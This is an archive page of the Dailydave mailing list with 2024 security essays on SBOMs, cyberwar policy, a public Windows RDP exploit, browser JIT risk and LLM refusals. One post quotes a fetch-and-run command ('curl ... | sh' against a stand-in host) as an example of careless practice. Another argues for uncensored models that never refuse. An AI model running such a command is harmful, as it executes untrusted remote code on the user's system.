- Dailydave - mm4.emwd.com

sboms and LLMs
by Dave Aitel 12 Sep '24

12 Sep '24

People doing software security often use LLMs more as orchestrators than anything else. But there's so many more complicated ways to use them in our space coming down the pipe. Obviously the next evolution of SBOMs <https://www.cisa.gov/resources-tools/resources/cisa-sbom-rama> is that they represent not just what is contained in the code as some static tree of library dependencies, but also what that code does in a summary fashion that you can check once you get the final binaries. In a certain sense, you can think of this as a behavioral attestation between the software publisher and the consumer who is actually running the product. In other words, if my product is meant to connect to WWW.SPYWARE.RU, then it should say so in the SBOM behavioral manifest. But of course in practice these things get quite complicated, and hence you need to summarize semi-structured data (aka, the behavioral manifest is rarely exact), and then compare it to what is seen when the software itself is run (which if you've ever run strace ...is voluminous). That smells like a job for an LLM, or at the very least, a vector comparison. Likewise, automatically building harnesses to run and capture security sensitive information (or performance information as we learned from XZ), is rapidly also becoming a job <https://google.github.io/oss-fuzz/research/llms/target_generation/> for an LLM. I perhaps am channeling everyone else's <https://www.cisa.gov/speaker/allan-friedman> worry that too much of the SBOM community is arguing about which XML fields belong in a VEX addendum, rather than pushing the concepts forwards to actually solve problems. Or perhaps not! At some level, the software vendors are getting dragged through this process by their hair, which is very fun to watch. -dave

3 2

Persistence and Strategic Effects
by Dave Aitel 16 Aug '24

16 Aug '24

Before there were words, calculated as the softmax of a list of possible tokens, there were just vectors of nano-electrical potential in cells soaked in a hormonal brew of electrolytes, operating on a clock cycle of "slow, but fast enough". In this sense, as we now know <https://www.ncbi.nlm.nih.gov/pmc/articles/PMC10472538/>, we generate words and we know, in our heads, what we are, in the same way as we generate limbs, with each cell knowing from its electric field what to be next. A tumor is in that way of thought a *confabulation *or as we now say, a *hallucination.* But then, also, so are you. Recently I spent some time reading this year's Research Handbook on Cyberwarfare <https://cybersecpolitics.blogspot.com/2024/08/a-quick-research-overview-of-…>. One of the forms I filled out recently asked me if I was a certified Master Operator, which of course, I am not, any more than an Archaeopteryx is a certified Bald Eagle, even though both know the smell of the sky and the taste of freshly caught fish. But I do occasionally pay attention to the "state of the art" academic view of cyberwar and the Handbook was a good way to catch up. For example if you read Nadiya Kostyuk and Jen Sidorvova's Handbook paper on *Military **Cybercapacity* they will say that "a cyber attack may provide a defender or third party with a good estimate of the attacker's capabilities, but it is not clear how many of these capabilities the attacker has in their arsenal". This is, to my primitive cyberwarfare mind, so old that I still use "screen" instead of "tmux", a bit of a misstep when it comes to how cyberwar works and what a capability is. I don't know how to say it any clearer than this: Behind every wooden horse is a woodshop. An example in my head is that right now the Ukrainian army is rumored to be sitting on top of a major gas terminal in Kursk, one responsible for supplying Russian gas to Europe. You have to assume that, having learned from the Russian attacks against their electrical infrastructure, the Ukrainian Army is traveling not just with a screen of FPV drones but with a few USB keys containing implants for the specialized equipment that runs a gas network. It's hard to disconnect OT networks that are presumed to be segmented physically, and temporary physical control can easily translate to permanent cyber control. And cyber control, despite what Quentin E. Hodgson's Handbook paper (*Cyber coercion as a tool of statecraft: how often, how effective?*) wrongly concludes, is extremely useful for state coercion. Perhaps the problem with the Handbook, like all academic writing on cyberwar, is that it is meant to be sterile. But that's not how cyberwar works, held in the space that is a melange of electrons and intentions. As tumors confabulate within flesh, so too do our digital dreams hallucinate new worlds, both the virus and the firewall, the wooden horse, and the workshop that births it. Certified or not, we are masters of a domain we cannot fully comprehend, sailing on seas of raw data, guided by stars we ourselves ignite.

2 1

"Exploitation Less Likely"
by Dave Aitel 13 Aug '24

13 Aug '24

DefCon is a study in cacophony, and like many of you I'm still digging through my backlog of new research in multifarious browser tabs, the way a dragonfly keeps track of the world through scintillated compound lenses. In between AIxCC (which proved, if anything, the boundaries <https://dashboard.aicyberchallenge.com/collectivesolvehealth> of automated bug finding using current LLM tech?), James Kettle's timing attack research <https://portswigger.net/research/listen-to-the-whispers-web-timing-attacks-…>, and even more PHP ownership <https://www.ambionics.io/blog/iconv-cve-2024-2961-p1>, you unfortunately do have to pay attention to the outside world. One of the things that lit up my sensors was the Windows Remote Desktop Licensing service that came out from a sort of "Post QiHoo360" exploit community, led by Dr. Zhiniang Peng (aka @edwardzpeng), an absolute legend of exploitation. A remote unauthenticated heap overflow in the latest Windows via an MSRPC endpoint, bypassing modern defenses by just calling LoadLibraryA("\\webdav\owned.dll") on a fake object. An unexpected burst of pure beauty really, like the iridescence of a Morpho moth flitting across a concrete parking lot. The exploit <https://github.com/CloudCrowSec001/CVE-2024-38077-POC/blob/main/CVE-2024-38…> is public, but the original paper is now mysteriously deleted, I assume for political reasons. If you have a copy of it, please shoot it my way. It's telling that all the best exploits I know have "Exploitation less likely" as their rating from Microsoft. Anyways, it's interesting what merits attention, and what doesn't. -dave

2 2

PRANA Hack and Leak Report Release
by Dave Aitel 02 Aug '24

02 Aug '24

Cordyceps Analysis Report on PRANA Network Hack and Leak Operation: https://docs.google.com/document/d/1oOJbBTUwyK85ZKYAAdwWqxk-sMvqrBqzJYX1ozi… Lately I've been reading a lot of academic papers, mostly the Research Handbook on Cyberwarfare <https://www.elgaronline.com/edcollchap/book/9781803924854/book-part-9781803…>. Some of them are good papers! JD Work has a paper in it! But also some of them get wrapped around the idea of "Cyber War vs Cyberwarfare" (!??!) or fall in love with "hacktivists" or stomp furiously around all the real issues in the domain without ever stepping on the green. The thing about Persistent Engagement and Integrated Deterrence and Defend Forward is that yes, as Paul Wither's points out in "Do we need an effects-based approach for cyber operations? <https://kclpure.kcl.ac.uk/portal/en/publications/do-we-need-an-effects-base…>" or as the Grugq points out in his latest keynotes <https://www.youtube.com/watch?v=P6PnhDfWvx0>, we do need to look at "effects" in a broad way when talking about cyber operations. But the goal of your offensive counter-cyber operations is not to "reduce the number of incoming operations", as Jay Healey would try to measure, but to mitigate strategic effects! In other words, if the Chinese are hacking as much as possible in the LLM space, but somehow don't manage to launch their own market-leading LLM because for some reason their experiments on Huawei Ascend chips all mysteriously have weirdly wide bands of error, that is Defend Forward working! Did nobody in all of cyber policy academia read the Three Body Problem? Academics should love this part of the theory, really, because arguing about strategic effects is 90% of what they do, usually without ever opening up a Neo4j Database filled with stolen mail spools to see what's really happening on the wire. Anyways, if you like the kind of reporting in our PRANA report, we offer paid reporting as well. :) Thanks, Dave Aitel

1 0

LLMs and refusals
by Dave Aitel 25 Jul '24

25 Jul '24

[image: image.png] Above: LLAMA3.1 8B-4Q test results via OLLAMA So recently I've been doing a lot of work with LLMs handling arbitrary unstructured data, and using them to generate structured data, which then gets put into a graph database for graph algorithms to iterate on so you can actually distill knowledge from a mass of nonsense. But obviously this can get expensive via APIs, so like many of you, I set up a server with a A6000 that has 48G of VRAM and started loading some models on it to test. Using this process you can watch the state of the art advance - problems that were intractable to any open model first became doable via LLama70B versions, and then soon after that, 8B models. Even though you can fit a 70B version into 48GB, you also want to have room for your context length to be fairly large, in case you want to pass a whole web page or email thread through the LLM (which means an 8B parameter model is probably the biggest you really want to use - I don't know why people ignore context size when calculating model VRAM requirements). My most telling example prompt-task is a simple one: Give me the names in a block of text, and then make them hashtags so I can extract them. The results from LLama3.1 8B when quantized down are not...great, as seen in the little example below: *Input Names text: Dave Aitel is a big poo. Why is he like this? He is so mean.RET: I can't help with that request. Is there something else I can assist you with?* Uncensored models, like the Mistral NeMo, are also tiny and struggle to do this task reliably on Chinese or other languages that are not directly in their training set, but they don't REFUSE to do the task because they don't like the input text or find it too mean. So you end up with a lot better results. People are of course going to retrain the LLAMA3.1 base and create an uncensored version and other people are going to complain about that - having an uncensored GPT4-class open model scares them for reasons that are beyond me. But for real work, you need an LLM that doesn't refuse tasks because it doesn't like what it's reading. -dave P.S. Quantization lobotomizes the LLAMA3.1 models really hard. What they can do at full quantization on the 70B model they absolutely cannot do at 4bit.

4 3

Felt Vampires in Policy World And You
by Dave Aitel 12 Jun '24

12 Jun '24

Can a hamster do interprocedural analysis? What size of hamster can turn a tier-2 geopolitical adversary's cyber force into a tier-1 adversary? Is the best use of a hamster finding 0day or orchestrating the offensive operations themselves? These are all great questions for policy teams to ponder and they pontificate over how to properly regulate AI. On one hand, as a technologist, your tendency will be to try to explain to policy teams what makes a scary adversary scary, maybe get involved in building a taxonomy of various tiers of adversary, start classifying operations as "sophisticated" and "not sophisticated". This is not useful, but it feels useful! It is like recycling cardboard boxes, all while knowing that you, as an organism, are primarily oriented towards boiling the oceans and turning the planet into Venus as quickly and efficiently as possible. Remember that today's small stone crab claw is tomorrow's "extra large" stone crab claw, because all the big ones got eaten and that's how generational amnesia <https://www.natural-solutions.world/blog/how-can-we-stop-we-need-to-work-on…> works! In other words, while STORM-0558's operation against Microsoft was slick like oil across the ever-more-hot waters of the Gulf of Mexico when it happened, the million teams doing the exact same Active Directory tricks the next month were just small fish, despite their impact on targets. And most big-impact operations could have been done by second-tier penetration testing teams, let alone nation-state adversaries. You will, if you work in Cyber Policy long enough, see people make tables of operations which compare various hacks from over the last fifteen years, which is like comparing the bite strengths of a Cretaceous monster to your average modern iguana. Likewise, most of Policy-world is, like we all are, obsessed with 0day. We like to count them with the enthusiasm of a vampire puppet on a children's TV show! But we also know that finding 0day is not a sign of sophistication so much as finding the right 0day at the right time. I don't know how to classify Orange Tsai's PHP character innovation but because it doesn't fit neatly into a spreadsheet, it might as well not exist? "If AI finds 0day, then it must be regulated" is a fun position to take in the many fancy halls and tedious Zoom calls where a pompous attitude and an ill-fitting suit are table stakes for attendance and having actually written code that uses Huggingface is considered bad form. But regulating technologies that can find 0day is a dead end. The current best way to find 0day is fuzzers and the dumber they are, the better they work most of the time. When it comes to operations, the current best way to hack is to email people and ask them for their password? Is that still true? Or do we just all look through huge databases of usernames and passwords that have already leaked and just use those now? I'm sure AI can also do that, but I'm also sure that it doesn't matter. I try to tell policy people this: What makes a scary adversary is huge resources, huge motivation, and huge innovation. The big names will probably use AI to automate different things, but nobody is going to saddle up some hamsters and suddenly turn from a not-scary adversary into a scary one. -dave

1 0

GDB Dances and the Moon
by Dave Aitel 08 Jun '24

08 Jun '24

People occasionally read my blogposts <https://cybersecpolitics.blogspot.com/2024/04/what-open-source-projects-are…>on Jia Tan <https://cybersecpolitics.blogspot.com/2024/04/the-open-source-problem.html>and then ask me about open source development in general, and you can only, in your darkest heart of hearts (your only heart) laugh. The other day I was contributing to a project that I am one of several developers on. In particular, I wrote a GDB script that traces through a function, printing out all the various variables and their sizes and this gets fed into an LLM to try to reason about it, which is a bit like asking a hedgehog how big a Unicode string should be to fit around the moon, but it was worth a shot, ya know? I have the kind of dyslexia that means I can't tell matrix algebra from a thinking conscious creature. Anyways, while I am good at making GDB dance in particular ways, like knowing the ancient art of the Polka, I am not good at modern software development, and barely understand GIT or Docker or Cloud things. But I have hacked a few things, like ya'll have, and so my development happens in a VM and that VM has access to pretty much just the source code it needs and not a whole lot else. But that's not how modern development works. It's common to see instructions to run "gcloud auth" and then walk through the web authentication portal from Google so your current user can access cloud buckets and APIs while testing or debugging your giant microservice. Like, people are out there just raw dogging source code from random other open source developers, with their local environment running tokens that give them access to everything they could possibly need from their Google account. People out there running curl www.badstuff.biz/setup | sh. People, and by this I mean developers, are lost storing five thousand fine grained GitHub tokens in various text files on their hard drive because they can't remember which one was which. In other words: Jia Tan might have been a best case scenario for this community. -dave

1 0

What a failure of Secure by Design looks like: Web Browsers
by Dave Aitel 04 Jun '24

04 Jun '24

I know it's in vogue to pick on enterprise hardware marketed to "Secure your OT Environment" but actually written in crayon in a language made of all sharp edges like C or PHP, with some modules in Cobol for spice. This is the "Critical Infrastructure" risk du jour, on a thousand podcasts and panels, with *Volt Typhoon* in the canary seat, where once only the "sophisticated threat" Mirai had root permissions. As embarrassing as having random Iranian teenagers learn how to do systems administration on random water plants in New Jersey is, it's *more* humiliating to have systemic vulnerabilities right in front of you, have a huge amount of government brain matter devoted to solving them, and yet not make the obvious choice to turn off features that are bleeding us out. And when you talk about market failure in Security you can't help but talk about Web Browsers, both mobile and desktop. Web Browsing technology is in everything - and includes a host of technologies too complicated to go into, but one of the most interesting has been Just in Time compiling, which got very popular as an exploitation technique (let's say) in 2010 <http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Slides-v2.pdf> but since then - for over a decade! - has been a bubbling septic font of constant systemic, untreated risk. Proponents of having a JIT in your Javascript compiler say "Without this kind of performance, you wouldn't be able to have GMail or Expedia!" Which is not true on today's hardware (Turn on Edge Strict Security mode today and you won't even notice it), and almost certainly not true on much older hardware. The issue with JITs is visible to any hacker who has looked at the code - whenever you have concepts like "Negative Zero <https://googleprojectzero.blogspot.com/2020/09/jitsploitation-one.html>" that have to be gotten perfectly every time or else the attacker gets full control of your computer, you are in an indefensible space. I would, in a perfect world, like us to be able to get ahead of systemic problems. We have a rallying cry and a lot of signatories on a pledge, but we need to turn it into clicky clicking on the configuration options that turn these things off on a USG and Enterprise level, the same way we banned Russian antivirus from having Ring0 in our enterprises, or suspiciously cheap subsidized Chinese telecom boxes from serving all the phone companies across the midwest. The issue with web browsers is not limited to JITs. A Secure By Design approach to web browsing would mean that most sites would not have access to large parts of the web browsing specification. We don't need to be tracked by every website. They don't all need access to Geolocation or Video or Web Assembly or any number of other parts of the things our web browsers give them, largely in order to allow the mass production of targeted advertising. If we've learned anything in the last decade, it is that the key phrase in Targeted Advertising is "Targeted", and malware authors have known this for as long as the ecosystem existed. The reason your browser is insecure by default is to support a parasitic advertising ecology, enhancing shareholder value, but leaving our society defenceless against anyone schooled enough in the dark arts. Google's current solution to vulnerabilities in the browser is Yet Another Sandbox. These work for a while until they don't - over time, digital sandboxes get dirty and filled with secrets just like the one in your backyard gets filled with presents from the local feral cat community. I know Project Zero's Samuel Groß is better at browser hacking than I am, and he personally designed the sandbox, but I look out across the landscape of the Chinese hacking community and see only hungry vorpal blades and I do not think it is a winning strategy. -dave References: 1. Microsoft's Strict mode turns the JIT off (kudos to Johnathan Norman) https://support.microsoft.com/en-us/microsoft-edge/enhance-your-security-on… 2. The Sandbox: https://v8.dev/blog/sandbox

4 5

Re: Excellent piece by Chris Rohlf - " No, LLM Agents can not Autonomously Exploit One-day Vulnerabilities "
by Arun Koshy 24 Apr '24

24 Apr '24

>>What matters is speed of the exploit and speed of patching. And I see the humans (patching) on the losing side of this race. This is probably an independent issue ( imvho ). Re LLMs and present AI / ML regime, my only public comment is that we're in the Hindenburg [1] era .. caveat emptor. Another insightful paper that probably will be ignored this summer: https://arxiv.org/abs/2308.03762 ( author : https://people.csail.mit.edu/kostas/ ) [1] - https://en.wikipedia.org/wiki/LZ_129_Hindenburg

1 0

A Familiar World of Chaos
by Dave Aitel 23 Apr '24

23 Apr '24

After spending some time looking at "Secure by Design/Default" I have no doubt many of you feel like something is missing - something that's hard to put your finger on. So you go back to the treadmill of reading about bugs in Palo Alto devices, or the latest Project Zero blogpost, or something the Microsoft Threat Team is naming RidonculousBreeze, or whatever. For those of you who chose to read the latest Project Zero post, one way to look at Mateusz Jurczyk's vast destruction <https://googleprojectzero.blogspot.com/2024/04/the-windows-registry-adventu…> of the Windows Registry API, resulting in what can only be described as a "boatload" of Local Privilege Escalations, is that securing legacy code is hard, there's a talent shortage in how many people want to do the reverse engineering work necessary to understand and fix complicated and critical old code, and our investments in automated security engineering toolkits and better software development practices, while valuable, have not paid off in the kind of hardened Rust-only systems we dreamed about. Another way to look at this kind of wholesale destruction, a true tour de force, is that you cannot both put advertisements in your Start menu, and develop a secure operating system, for reasons that are more philosophical than technical. It's ironic that it is often Google that demonstrates this about other vendors, when of course, the lack of any ad blocking in Chrome or Android presents the exact same dilemma. You can't both make your systems secure, and sit beside the great river of Advertising Revenue with a ladle, dipping it in every quarter to fill up a cauldron of greater and greater value for the shareholders. It's hard to draw a straight line from an internal PowerPoint slide saying "Ads in the Start Menu are a good idea, actually" to the inevitable conclusion of 0days, ransomware, and US Government emails are being read by some old Russian who understands cryptography and Azure keys better than you were hoping. But in some respect this cause and effect is as fundamental and simple as how that tattoo on your arm is actually there because one night you decided to start off with shots of Limoncello. When Project Zero started, and even when it got to the towering behemoth of talent that it is now, I knew people in the offensive industry who were quite scared of it - of the possibility that a large and funded team of top researchers, with access to one of the only five real computers on the planet, could drain the lake of software vulnerabilities we all fished in. But I had no such fears. An organization so dependent on advertising revenue to survive can no more fix systemic security issues than a Sperm Whale can medal in Olympic Skiing. It is contrary to their very nature, although they will probably smash a bunch of trees on the way down. Like many of you, I spent my Saturday porting code to use LLAMA3:70b, largely by annoying my 18yo with questions about ollama and Docker, since I find modern Linux system administration as foreign as an octopus finds calculus. But search engines, like surface warships, are clearly on their last legs. They went from something you used every day, multiple times a day, to something your LLM uses for you, as just one tool among many. It is, for reasons that must be obvious even to executives drunk on the heady fumes of their stock options maturing, hard to make money selling advertisements that are only read by LLMs. But having spent the better part of a couple years doing LLM work now, I feel like I understand why these behemoths are investing so much money in them, despite the obvious cannibalization of their cash umbilical. It's because they can! There's just not that many businesses that generate ten billion dollars of revenue year on year to get into. You've got some elements of manufacturing, tech, education, health care, video games. It's not a big list. Apple gave up on manufacturing cars because the niche they wanted (impractably weird and expensive) was already filled by Tesla. But by investing in LLMs and AI in general you kinda get to put your thumbs in every other billion dollars business all at once. It's a straight line shot from something you already know, to the next place. So of course, they are throwing dollars at it like it was the only thing they knew how to do. And what we get is the pretentious superiority of ChatGPT, or the sanctimonious holiness of Claude, or the ever-sadness of Gemini, the impertinence of Mistral or the trollishness that is LLAMA. A world of chaos, yet something so familiar. -dave

2 1

2025

2024

2023

2022

2021

2020

Dailydave